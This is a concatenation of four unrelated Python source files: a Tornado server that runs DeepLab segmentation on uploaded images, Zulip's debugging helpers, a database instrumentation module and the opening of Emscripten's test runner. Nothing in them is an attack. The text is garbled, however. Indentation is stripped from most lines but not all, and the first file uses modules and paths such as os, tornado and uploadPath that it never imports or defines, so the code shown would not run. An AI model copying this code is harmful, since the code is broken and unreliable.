import uuid
from tornado.options import define, options
from Queue import Queue
from threading import Thread
from datetime import datetime
import time
import datetime
from PIL import Image
import tensorflow as tf
import numpy as np
from deeplab_resnet import DeepLabResNetModel, ImageReader, decode_labels, dense_crf, prepare_label
SAVE_DIR = './output/'
IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)
GPU=1
###
port = 8888
ipaddress = "131.179.142.7"
hostUrl = "http://"+ipaddress+":"+str(port)
define("port", default=port, help="run on the given port", type=int)
quit = False
requestQueue = Queue()
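# Flow: Tornado handles uploads on the main thread and pushes a file ID onto
# requestQueue; one background worker thread per GPU pops IDs, runs DeepLab
# segmentation and writes the mask PNG into results/, which is then served back
# at /result/<id>.png.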
def timestampMs():
return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler),
(r"/upload", UploadHandler),
(r"/result/(.*)", tornado.web.StaticFileHandler, {"path" : "./results"}),
(r"/status", StatusHandler)
]
tornado.web.Application.__init__(self, handlers)
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render("upload_form.html")
class UploadHandler(tornado.web.RequestHandler):
def post(self):
print("New upload request "+str(self.request))
if requestQueue.qsize() > 0:
print("Pending request in progress... REPLY 423")
self.set_status(423)
self.finish("service is not available. try again later")
return
fileData = self.request.files['file'][0]
original_fname = fileData['filename']
extension = os.path.splitext(original_fname)[1]
fileID = str(uuid.uuid4())
fname = os.path.join(uploadPath, fileID)
        imageFile = open(fname, 'wb')
        imageFile.write(fileData['body'])
        imageFile.close()
requestQueue.put(fileID)
print("Submitted request " + fileID + " for segmentation processing");
self.finish(hostUrl+"/result/"+fileID+".png")
class StatusHandler(tornado.web.RequestHandler):
def get(self):
self.finish("ok")
### DEEPLAB STUFF BELOW
def load(saver, sess, ckpt_path):
'''Load trained weights.
Args:
saver: TensorFlow saver object.
sess: TensorFlow session.
ckpt_path: path to checkpoint file with parameters.
'''
saver.restore(sess, ckpt_path)
print("Restored model parameters from {}".format(ckpt_path))
def deeplabProcessing(gpuId):
"""Create the model and start the evaluation process."""
print("Starting worker on GPU "+str(gpuId) + "...")
def printWorker(msg):
print(str(timestampMs())+" [gpu-worker-"+ str(gpuId)+"] " + msg)
printWorker("Waiting for segmentation requests...")
initialized = False
while (not quit):
fileId = requestQueue.get() # will block
if fileId == "quit"+str(gpuId):
printWorker("Received quit command")
break
printWorker("Received request for DL segmentaiton: "+fileId)
printWorker("Requests queue size: " + str( requestQueue.qsize()))
t1 = timestampMs() #datetime.datetime.now()
imgPath = os.path.join(uploadPath, fileId)
# Prepare image.
imgRGB = tf.image.decode_jpeg(tf.read_file(imgPath), channels=3)
# Convert RGB to BGR.
img_r, img_g, img_b = tf.split(imgRGB, 3, axis=2)
imgBGR = tf.cast(tf.concat([img_b, img_g, img_r], 2), dtype=tf.float32)
# Extract mean.
imgBGR -= IMG_MEAN
printWorker("Will create network")
# Create network.
net = DeepLabResNetModel({'data': tf.expand_dims(imgBGR, dim=0)}, is_training=False)
tf.get_variable_scope().reuse_variables()
printWorker("Network created")
# Which variables to load.
restore_var = tf.global_variables()
# Predictions.
raw_output = net.layers['fc1_voc12']
raw_output_up = tf.image.resize_bilinear(raw_output, tf.shape(imgBGR)[0:2,])
printWorker("Predictions")
# CRF.
raw_output_up = tf.nn.softmax(raw_output_up)
raw_output_up = tf.py_func(dense_crf, [raw_output_up, tf.expand_dims(imgRGB, dim=0)], tf.float32)
printWorker("CRF")
raw_output_up = tf.argmax(raw_output_up, dimension=3)
pred = tf.expand_dims(raw_output_up, dim=3)
if not initialized:
printWorker("Setup tf session")
# Set up TF session and initialize variables.
config = tf.ConfigProto(device_count = {'GPU': gpuId})
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
init = tf.global_variables_initializer()
sess.run(init)
printWorker("TF session initialized")
# Load weights.
loader = tf.train.Saver(var_list=restore_var)
load(loader, sess, weightsModelPath)
initialized = True
# Perform inference.
preds = sess.run(pred)
msk = decode_labels(preds)
im = Image.fromarray(msk[0])
maskPath = os.path.join(resultsPath, fileId)+".png"
im.save(maskPath)
originalFile = os.path.join(uploadPath,fileId)
os.remove(originalFile)
t2 = timestampMs() #datetime.datetime.now()
printWorker("Processing took "+str(t2-t1)+"ms. Result is at "+maskPath)
def signal_handler(signum, frame):
    global quit
print('Received stop signal, exiting...')
tornado.ioloop.IOLoop.instance().stop()
quit = True
def main():
signal.signal(signal.SIGINT, signal_handler)
# TODO: this can be expanded to utilize more than one GPU
nGpus = 1
workers = []
for i in range(0,nGpus):
worker = Thread(target=deeplabProcessing, args=(i,))
worker.start()
workers.append(worker)
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
print("Will terminate GPU workers...")
for i in range(0,len(workers)):
requestQueue.put("quit"+str(i))
if __name__ == "__main__":
main()
|
debug.py
|
import code
import gc
import logging
import os
import signal
import socket
import threading
import traceback
import tracemalloc
from types import FrameType
from django.conf import settings
from django.utils.timezone import now as timezone_now
from typing import Optional
logger = logging.getLogger('zulip.debug')
# Interactive debugging code from
# http://stackoverflow.com/questions/132058/showing-the-stack-trace-from-a-running-python-application
# (that link also points to code for an interactive remote debugger
# setup, which we might want if we move Tornado to run in a daemon
# rather than via screen).
def interactive_debug(sig: int, frame: FrameType) -> None:
"""Interrupt running process, and provide a python prompt for
interactive debugging."""
d = {'_frame': frame} # Allow access to frame object.
d.update(frame.f_globals) # Unless shadowed by global
d.update(frame.f_locals)
message = "Signal received : entering python shell.\nTraceback:\n"
message += ''.join(traceback.format_stack(frame))
i = code.InteractiveConsole(d)
i.interact(message)
# SIGUSR1 => Just print the stack
# SIGUSR2 => Print stack + open interactive debugging shell
def interactive_debug_listen() -> None:
signal.signal(signal.SIGUSR1, lambda sig, stack: traceback.print_stack(stack))
signal.signal(signal.SIGUSR2, interactive_debug)
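# For example, once interactive_debug_listen() has been called in a process:
#   kill -USR1 <pid>   # print the current stack trace
#   kill -USR2 <pid>   # print the stack and open an interactive Python shell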
def tracemalloc_dump() -> None:
if not tracemalloc.is_tracing():
logger.warning("pid {}: tracemalloc off, nothing to dump"
.format(os.getpid()))
return
# Despite our name for it, `timezone_now` always deals in UTC.
basename = "snap.{}.{}".format(os.getpid(),
timezone_now().strftime("%F-%T"))
path = os.path.join(settings.TRACEMALLOC_DUMP_DIR, basename)
os.makedirs(settings.TRACEMALLOC_DUMP_DIR, exist_ok=True)
gc.collect()
tracemalloc.take_snapshot().dump(path)
with open('/proc/{}/stat'.format(os.getpid()), 'rb') as f:
procstat = f.read().split()
rss_pages = int(procstat[23])
logger.info("tracemalloc dump: tracing {} MiB ({} MiB peak), using {} MiB; rss {} MiB; dumped {}"
.format(tracemalloc.get_traced_memory()[0] // 1048576,
tracemalloc.get_traced_memory()[1] // 1048576,
tracemalloc.get_tracemalloc_memory() // 1048576,
rss_pages // 256,
basename))
def tracemalloc_listen_sock(sock: socket.socket) -> None:
logger.debug('pid {}: tracemalloc_listen_sock started!'.format(os.getpid()))
while True:
sock.recv(1)
tracemalloc_dump()
listener_pid = None # type: Optional[int]
def tracemalloc_listen() -> None:
global listener_pid
if listener_pid == os.getpid():
# Already set up -- and in this process, not just its parent.
return
logger.debug('pid {}: tracemalloc_listen working...'.format(os.getpid()))
listener_pid = os.getpid()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
path = "/tmp/tracemalloc.{}".format(os.getpid())
sock.bind(path)
thread = threading.Thread(target=lambda: tracemalloc_listen_sock(sock),
daemon=True)
thread.start()
logger.debug('pid {}: tracemalloc_listen done: {}'.format(
os.getpid(), path))
def maybe_tracemalloc_listen() -> None:
'''If tracemalloc tracing is enabled, listen for requests to dump a snapshot.
To trigger once this is listening:
echo | socat -u stdin unix-sendto:/tmp/tracemalloc.$pid
To enable in the Zulip web server: edit /etc/zulip/uwsgi.ini ,
and add e.g. ` PYTHONTRACEMALLOC=5` to the `env=` line.
This function is called in middleware, so the process will
automatically start listening.
To enable in other contexts: see upstream docs
https://docs.python.org/3/library/tracemalloc .
You may also have to add a call to this function somewhere.
'''
if os.environ.get('PYTHONTRACEMALLOC'):
# If the server was started with `tracemalloc` tracing on, then
# listen for a signal to dump `tracemalloc` snapshots.
tracemalloc_listen()
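# Illustrative sketch (not part of the original module): a Python equivalent of the
# `socat` command in the docstring above, for requesting a snapshot dump from a
# process whose pid is known.
def _example_request_tracemalloc_dump(pid: int) -> None:
    """Send one datagram to /tmp/tracemalloc.<pid>; the listener thread then dumps a snapshot."""
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
    try:
        sock.sendto(b"\n", "/tmp/tracemalloc.{}".format(pid))
    finally:
        sock.close()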
|
db.py
|
import asyncio
from contextvars import ContextVar
import logging
import os
import pickle
import re
import sqlite3
import sys
import threading
import time
from typing import Any, Callable, List, Mapping, Optional, Union
from urllib.parse import quote
import aiohttp.web
import aiosqlite
import asyncpg
import morcilla.core
from morcilla.interfaces import ConnectionBackend, TransactionBackend
import numpy as np
import sentry_sdk
from sqlalchemy import insert
from sqlalchemy.dialects.postgresql import insert as postgres_insert
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql import CompoundSelect, Select
from sqlalchemy.sql.functions import ReturnTypeFromArgs
from athenian.api import metadata
from athenian.api.models import check_alembic_schema_version, check_collation, \
DBSchemaMismatchError
from athenian.api.models.metadata import check_schema_version as check_mdb_schema_version
from athenian.api.slogging import log_multipart
from athenian.api.typing_utils import wraps
def add_pdb_metrics_context(app: aiohttp.web.Application) -> dict:
"""Create and attach the precomputed DB metrics context."""
ctx = app["pdb_context"] = {
"hits": ContextVar("pdb_hits", default=None),
"misses": ContextVar("pdb_misses", default=None),
}
return ctx
pdb_metrics_logger = logging.getLogger("%s.pdb" % metadata.__package__)
def set_pdb_hits(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Assign the `topic` precomputed DB hits to `value`."""
pdb.metrics["hits"].get()[topic] = value
pdb_metrics_logger.info("hits/%s: %d", topic, value, stacklevel=2)
def set_pdb_misses(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Assign the `topic` precomputed DB misses to `value`."""
pdb.metrics["misses"].get()[topic] = value
pdb_metrics_logger.info("misses/%s: %d", topic, value, stacklevel=2)
def add_pdb_hits(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Increase the `topic` precomputed hits by `value`."""
if value < 0:
pdb_metrics_logger.error('negative add_pdb_hits("%s", %d)', topic, value)
pdb.metrics["hits"].get()[topic] += value
pdb_metrics_logger.info("hits/%s: +%d", topic, value, stacklevel=2)
def add_pdb_misses(pdb: morcilla.Database, topic: str, value: int) -> None:
"""Increase the `topic` precomputed misses by `value`."""
if value < 0:
pdb_metrics_logger.error('negative add_pdb_misses("%s", %d)', topic, value)
pdb.metrics["misses"].get()[topic] += value
pdb_metrics_logger.info("misses/%s: +%d", topic, value, stacklevel=2)
Connection = morcilla.Connection
Database = morcilla.Database
_sql_log = logging.getLogger("%s.sql" % metadata.__package__)
_testing = "pytest" in sys.modules or os.getenv("SENTRY_ENV", "development") == "development"
_sql_str_re = re.compile(r"'[^']+'(, )?")
_log_sql_re = re.compile(r"SELECT|\(SELECT|WITH RECURSIVE")
def _generate_tags() -> str:
with sentry_sdk.configure_scope() as scope:
if (transaction := scope.transaction) is None:
return ""
values = [
f"application='{metadata.__package__}'",
f"framework='{metadata.__version__}'",
f"route='{quote(transaction.name)}'",
f"traceparent='{transaction.trace_id}'",
f"tracestate='{scope.span.span_id}'",
]
try:
values.append(f"controller='{scope._tags['account']}'")
except KeyError:
pass
values.append(
f"action='{';'.join(k for k, v in scope._tags.items() if isinstance(v, bool))}'")
return " /*" + ",".join(sorted(values)) + "*/"
async def _asyncpg_execute(self,
query: str,
args,
limit,
timeout,
**kwargs):
description = query = query.strip()
if query.startswith("/*"):
log_sql_probe = query[query.find("*/", 2, 1024) + 3:]
else:
log_sql_probe = query
if _log_sql_re.match(log_sql_probe) and not _testing:
from athenian.api.tracing import MAX_SENTRY_STRING_LENGTH
if len(description) <= MAX_SENTRY_STRING_LENGTH and args:
description += " | " + str(args)
if len(description) > MAX_SENTRY_STRING_LENGTH:
transaction = sentry_sdk.Hub.current.scope.transaction
if transaction is not None and transaction.sampled:
query_id = log_multipart(_sql_log, pickle.dumps((query, args)))
brief = _sql_str_re.sub("", query)
description = "%s\n%s" % (query_id, brief[:MAX_SENTRY_STRING_LENGTH])
with sentry_sdk.start_span(op="sql", description=description) as span:
if not _testing:
query += _generate_tags()
result = await self._execute_original(query, args, limit, timeout, **kwargs)
try:
span.description = "=> %d\n%s" % (len(result[0]), span.description)
except TypeError:
pass
return result
async def _asyncpg_executemany(self, query, args, timeout, **kwargs):
with sentry_sdk.start_span(op="sql", description="<= %d\n%s" % (len(args), query)):
return await self._executemany_original(query, args, timeout, **kwargs)
asyncpg.Connection._execute_original = asyncpg.Connection._Connection__execute
asyncpg.Connection._Connection__execute = _asyncpg_execute
asyncpg.Connection._executemany_original = asyncpg.Connection._executemany
asyncpg.Connection._executemany = _asyncpg_executemany
class greatest(ReturnTypeFromArgs): # noqa
"""SQL GREATEST function."""
class least(ReturnTypeFromArgs): # noqa
"""SQL LEAST function."""
db_retry_intervals = [0, 0.1, 0.5, 1.4, None]
def measure_db_overhead_and_retry(db: Union[morcilla.Database, Database],
db_id: Optional[str] = None,
app: Optional[aiohttp.web.Application] = None,
) -> Union[morcilla.Database, Database]:
"""
Instrument Database to measure the time spent inside DB i/o.
Also retry queries after connectivity errors.
"""
log = logging.getLogger("%s.measure_db_overhead_and_retry" % metadata.__package__)
backend_connection = db._backend.connection # type: Callable[[], ConnectionBackend]
def wrapped_backend_connection() -> ConnectionBackend:
connection = backend_connection()
connection._retry_lock = asyncio.Lock()
def measure_method_overhead_and_retry(func) -> callable:
async def wrapped_measure_method_overhead_and_retry(*args, **kwargs):
start_time = time.time()
wait_intervals = []
raw_connection = None
try:
raw_connection = connection.raw_connection
if (
(isinstance(raw_connection, asyncpg.Connection) and
raw_connection.is_in_transaction())
or
(isinstance(raw_connection, aiosqlite.Connection) and
raw_connection.in_transaction)
):
# it is pointless to retry, the transaction has already failed
wait_intervals = [None]
except AssertionError:
pass # Connection is not acquired
if not wait_intervals:
wait_intervals = db_retry_intervals
async def execute():
need_acquire = False
for i, wait_time in enumerate(wait_intervals):
try:
if need_acquire:
await connection.acquire()
return await func(*args, **kwargs)
except (OSError,
asyncpg.PostgresConnectionError,
asyncpg.OperatorInterventionError,
asyncpg.InsufficientResourcesError,
sqlite3.OperationalError) as e:
if wait_time is None:
raise e from None
log.warning("[%d] %s: %s", i + 1, type(e).__name__, e)
if need_acquire := isinstance(e, asyncpg.PostgresConnectionError):
try:
await connection.release()
except Exception as e:
log.warning("connection.release() raised %s: %s",
type(e).__name__, e)
await asyncio.sleep(wait_time)
finally:
if app is not None:
elapsed = app["db_elapsed"].get()
if elapsed is None:
log.warning("Cannot record the %s overhead", db_id)
else:
delta = time.time() - start_time
elapsed[db_id] += delta
if db.url.dialect == "sqlite":
return await execute()
async with connection._retry_lock:
return await execute()
return wraps(wrapped_measure_method_overhead_and_retry, func)
connection.acquire = measure_method_overhead_and_retry(connection.acquire)
connection.fetch_all = measure_method_overhead_and_retry(connection.fetch_all)
connection.fetch_one = measure_method_overhead_and_retry(connection.fetch_one)
connection.execute = measure_method_overhead_and_retry(connection.execute)
connection.execute_many = measure_method_overhead_and_retry(connection.execute_many)
original_transaction = connection.transaction
def transaction() -> TransactionBackend:
t = original_transaction()
t.start = measure_method_overhead_and_retry(t.start)
t.commit = measure_method_overhead_and_retry(t.commit)
t.rollback = measure_method_overhead_and_retry(t.rollback)
return t
connection.transaction = transaction
return connection
db._backend.connection = wrapped_backend_connection
return db
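# Illustrative usage sketch (hypothetical DSN and id, not from this codebase): wrap a
# Database so that every query is timed into app["db_elapsed"] and retried after
# transient connectivity errors.
def _example_wrap_database(app: aiohttp.web.Application) -> Database:
    db = Database("postgresql://user:password@localhost:5432/metadata")
    return measure_db_overhead_and_retry(db, "mdb", app)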
def check_schema_versions(metadata_db: str,
state_db: str,
precomputed_db: str,
persistentdata_db: str,
log: logging.Logger,
) -> bool:
"""Validate schema versions in parallel threads."""
passed = True
logging.getLogger("alembic.runtime.migration").setLevel(logging.WARNING)
def check_alembic(name, cs):
nonlocal passed
try:
check_alembic_schema_version(name, cs, log)
check_collation(cs)
except DBSchemaMismatchError as e:
passed = False
log.error("%s schema version check failed: %s", name, e)
except Exception:
passed = False
log.exception("while checking %s", name)
def check_metadata(cs):
nonlocal passed
try:
check_mdb_schema_version(cs, log)
check_collation(cs)
except DBSchemaMismatchError as e:
passed = False
log.error("metadata schema version check failed: %s", e)
except Exception:
passed = False
log.exception("while checking metadata")
checkers = [threading.Thread(target=check_alembic, args=args)
for args in (("state", state_db),
("precomputed", precomputed_db),
("persistentdata", persistentdata_db),
)]
checkers.append(threading.Thread(target=check_metadata, args=(metadata_db,)))
for t in checkers:
t.start()
for t in checkers:
t.join()
return passed
DatabaseLike = Union[Database, Connection]
# https://stackoverflow.com/questions/49456158/integer-in-python-pandas-becomes-blob-binary-in-sqlite # noqa
for dtype in (np.uint32, np.int32, np.uint64, np.int64):
sqlite3.register_adapter(dtype, lambda val: int(val))
def _with_statement_hint(self, text, dialect_name="*"):
self._statement_hints += ((dialect_name, text),)
return self
CompoundSelect._statement_hints = ()
CompoundSelect.with_statement_hint = _with_statement_hint
@compiles(Select)
@compiles(CompoundSelect)
def _visit_select(element, compiler, **kw):
"""Prepend pg_hint_plan hints."""
per_dialect = [
ht
for (dialect_name, ht) in element._statement_hints
if dialect_name in ("*", compiler.dialect.name)
]
if per_dialect:
hints = "/*+\n %s\n */\n" % "\n ".join(per_dialect)
statement_hints = element._statement_hints
element._statement_hints = ()
else:
hints = ""
statement_hints = ()
try:
text = getattr(compiler, f"visit_{element.__visit_name__}")(element, **kw)
finally:
element._statement_hints = statement_hints
if hints:
return hints + text
return text
async def insert_or_ignore(model,
values: List[Mapping[str, Any]],
caller: str,
db: Database) -> None:
"""Insert records to the table corresponding to the `model`. Ignore PK collisions."""
if db.url.dialect == "postgresql":
sql = postgres_insert(model).on_conflict_do_nothing()
elif db.url.dialect == "sqlite":
sql = insert(model).prefix_with("OR IGNORE")
else:
raise AssertionError(f"Unsupported database dialect: {db.url.dialect}")
with sentry_sdk.start_span(op=f"{caller}/execute_many"):
if db.url.dialect == "sqlite":
async with db.connection() as pdb_conn:
async with pdb_conn.transaction():
await pdb_conn.execute_many(sql, values)
else:
await db.execute_many(sql, values)
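# Illustrative usage sketch (hypothetical model and rows): bulk-insert while silently
# skipping primary key collisions; this maps to ON CONFLICT DO NOTHING on PostgreSQL
# and INSERT OR IGNORE on SQLite.
async def _example_insert_or_ignore(model: Any, db: Database) -> None:
    rows = [{"id": 1, "name": "first"}, {"id": 2, "name": "second"}]
    await insert_or_ignore(model, rows, "_example_insert_or_ignore", db)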
def extract_registered_models(base: Any) -> Mapping[str, Any]:
"""Return the mapping from declarative model names to their classes."""
try:
# 1.3
return base._decl_class_registry
except AttributeError:
# 1.4+
return base.registry._class_registry
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
tests/runner asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from enum import Enum
from functools import wraps
from subprocess import PIPE, STDOUT
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import stat
import sys
import tempfile
import time
import unittest
import webbrowser
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import get_canonical_temp_dir, try_delete
from tools.utils import MACOS, WINDOWS
from tools import shared, line_endings, building, config
def path_from_root(*pathelems):
"""Construct a path relative to the emscripten root directory."""
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger("runner")
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once it's been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0')) or shared.DEBUG
TEST_ROOT = path_from_root('tests')
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return os.path.join(TEST_ROOT, *path_components)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
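# Illustrative sketch (hypothetical decorator name, not part of the suite): skip_if()
# above can be used to build condition-based skip decorators, e.g. one that skips a
# test whenever the test class's is_wasm() predicate returns False.
def _example_requires_wasm(note=''):
  return lambda f: skip_if(f, 'is_wasm', note, negate=True)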
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dylink()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
def decorated(self):
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
f(self)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Setting a value to None means clearing the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
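# Illustrative sketch (hypothetical variable name, assuming it is not already set in
# the environment): env_modify()/with_env_modify() apply temporary environment changes
# and restore the previous environment when the block exits.
def _example_env_modify():
  with env_modify({'EMTEST_EXAMPLE_VAR': '1'}):
    assert os.environ['EMTEST_EXAMPLE_VAR'] == '1'
  assert 'EMTEST_EXAMPLE_VAR' not in os.environ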
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
def make_executable(name):
os.chmod(name, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict',
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
'asan',
'lsan',
'wasm2ss',
'posixtest',
'posixtest_browser',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.node_args = []
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
